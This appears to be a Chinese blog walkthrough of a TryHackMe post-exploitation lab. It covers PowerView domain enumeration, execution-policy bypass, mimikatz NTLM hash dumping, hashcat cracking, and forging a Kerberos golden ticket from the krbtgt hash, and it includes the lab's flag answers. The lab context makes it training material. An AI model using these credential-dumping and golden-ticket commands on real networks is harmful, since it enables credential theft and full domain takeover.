开发后基础知识

https://tryhackme.com/room/postexploit

使用 mimikatz、bloodhound、powerview 和 msfvenom 学习后期开发和维护访问的基础知识

介绍

从使用 powerview 和 bloodhound 进行后开发枚举,使用 mimikatz 倾倒哈希和金票攻击,使用 Windows 服务器工具和日志收集基本信息,然后我们将结束这个房间,讨论维护访问的基础知识persistence metaploit 模块并在机器中创建一个后门,以便在系统关闭或重置时获得即时 meterpreter shell

带Powerview的枚举

Powerview 是 powershell empire 的一个强大的 powershell 脚本,可用于在您已经在系统中获得 shell 后枚举域。

启动Powershell powershell -ep bypass -ep绕过powershell的执行策略让你轻松运行脚本

启动 PowerView -. .\Downloads\PowerView.ps1

枚举域用户 -Get-NetUser | select cn

枚举域组 Get-NetGroup -GroupName admin

回答以下问题

默认没有设置的共享文件夹是什么?

命令:Invoke-ShareFinder

结果:Share

除了 Windows Server 2019,网络内部运行的是什么操作系统?

命令:Get-NetComputer -fulldata | select operatingsystem

结果:Windows 10 Enterprise Evaluation

我在用户内部隐藏了一个标志找到它

命令:Get-NetGroup -GroupName *admin*

结果:POST{P0W3RV13W_FTW}

使用mimikatz转存哈希

Mimikatz 是一种非常流行且功能强大的后期开发工具,主要用于在活动目录网络中转储用户凭据

我们将专注于使用 mimikatz 转储 NTLM 哈希,然后使用 hashcat 破解这些哈希

privilege::debug 确保输出为“Privilege '20' ok”

这确保您以管理员身份运行 mimikatz;

如果您不以管理员身份运行 mimikatz,mimikatz 将无法正常运行



lsadump::lsa /patch 转储那些哈希值

使用 hashcat 破解那些哈希值

hashcat -m 1000 <hash> rockyou.txt

Mimikatz 有很多用途,除了是转储哈希值的好工具外,我们将在下一个任务中介绍另一种使用 mimikatz 的方法,即使用 mimikatz 创建一张金票

带有mimikatz的金票攻击

再次使用与上一个任务相同的工具;然而,这次我们将使用它来创建一张金票。

我们将首先转储 krbtgt 用户的哈希和 sid,然后创建一张金票,并使用该金票打开一个新的命令提示符,允许我们访问网络上的任何机器。

我已经花时间在机器上安装了 mimikatz。

转储 krbtgt 哈希

cd downloads && mimikatz.exe

privilege::debug    确保此输出 [privilege "20" ok]

lsadump::lsa /inject /name:krbtgt

这将转储 Kerberos 票据授予票据帐户的哈希和安全标识符,使您能够创建黄金票据。

创建一张金票

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

使用 Golden Ticket 访问其他机器

misc::cmd - 这将打开一个新的命令提示符,对所有机器都具有提升的权限

访问其他机器!- 您现在将有另一个命令提示符,可以访问网络上的所有其他机器

Post-Exploitation Basics的更多相关文章

  1. Security Testing Basics

    Security Testing BasicsSoftware security testing is the process of assessing and testing a system to ...

  2. Full exploitation of a cluster hardware configuration requires some enhancements to a single-system operating system.

    COMPUTER ORGANIZATION AND ARCHITECTURE DESIGNING FOR PERFORMANCE NINTH EDITION Operating System Desi ...

  3. Assembler : The Basics In Reversing

    Assembler : The Basics In Reversing Indeed: the basics!! This is all far from complete but covers ab ...

  4. The Basics of 3D Printing in 2015 - from someone with 16 WHOLE HOURS' experience

    全文转载自 Scott Hanselman的博文. I bought a 3D printer on Friday, specifically a Printrbot Simple Metal fro ...

  5. Cadence UVM基础视频介绍(UVM SV Basics)

    Cadence关于UVM的简单介绍,包括UVM的各个方面.有中文和英文两种版本. UVM SV Basics 1 – Introduction UVM SV Basics 2 – DUT Exampl ...

  6. C basics

    C 日记目录 C basics ................ writing Numeration storage   , structor space assigning pointer,  a ...

  7. Xperf Basics: Recording a Trace(转)

    http://randomascii.wordpress.com/2011/08/18/xperf-basics-recording-a-trace/   This post is obsolete ...

  8. Xperf Analysis Basics(转)

      FQ不易,转载 http://randomascii.wordpress.com/2011/08/23/xperf-analysis-basics/ I started writing a des ...

  9. Radio Basics for RFID

    Radio Basics for RFID The following is excerpted from Chapter 3: Radio Basics for UHF RFID from the ...

  10. 【IOS笔记】View Controller Basics

    View Controller Basics   视图控制器基础 Apps running on iOS–based devices have a limited amount of screen s ...

随机推荐

  1. nodsjs POST请求

    PHP 遇到问题: 1.跨域问题 报failed to load response data:no data fond for response with give header("Cont ...

  2. 蓝桥杯十一届JavaA组-C++解题

    本人随便乱写,目前正确性未知 C.本质上升序列 #include<bits/stdc++.h> using namespace std; bool access[4][4]; int df ...

  3. this关键字,static以及子类访问父类super关键字

    1.this是用来指代当前类实例化对象 public setid(id){thiis.id = id;} 即将传入的形参id赋值给当前类的id属性 2.this还可以调用方法,方法分为两种构造方法和普 ...

  4. ILLA Cloud: 调用 Hugging Face Inference Endpoints,开启大模型世界之门

    一个月前,我们 宣布了与 ILLA Cloud 与达成的合作,ILLA Cloud 正式支持集成 Hugging Face Hub 上的 AI 模型库和其他相关功能. 今天,我们为大家带来 ILLA ...

  5. 新一代自动化测试神器Playwright

    转载请注明出处️ 作者:测试蔡坨坨 原文链接:caituotuo.top/4bedb73c.html 你好,我是测试蔡坨坨. 说到WebUI自动化测试,首当其冲的当属Selenium,在很长的一段时间 ...

  6. Go语言实战: 即时通信系统(未完)

    使用Go语言构建一个即时通信系统,旨在锻炼Go语言编程能力 该通信系统至少能够允许用户能够在客户端进行公聊,即所发消息能被所有用户看到,也可发起私聊(即两个用户之间私密通信).同时,用户能够看到当前有 ...

  7. Mysql Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated column ‘xx‘

    MySql执行分组sql报错: Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated co ...

  8. 白嫖GitHub Action实现开源项目CICD

    什么是CI/CD?让你的项目变得更加敏捷! 在今天这个快速变化的时代,开发者们需要与时俱进,不断提升自己的工作效率.在这篇文章里,将一起探讨如何使用CI/CD和Github Action让你的项目更加 ...

  9. Vue中使用Echarts 脱坑

    1. 数据问题,不像官方实例所提供的数据直接写在options对应的数据源里,开发中应当是后端接口请求过来的数据,一般来说,会将echarts图标抽成组件的形式,需要的数据源通过父组件传给子组件,但是 ...

  10. css 文本超出,显示省略号

    单行文本省略号 显示省略号     text-overflow: ellipsis;     overflow: hidden;     max-width: 110px; 文本不换行     wor ...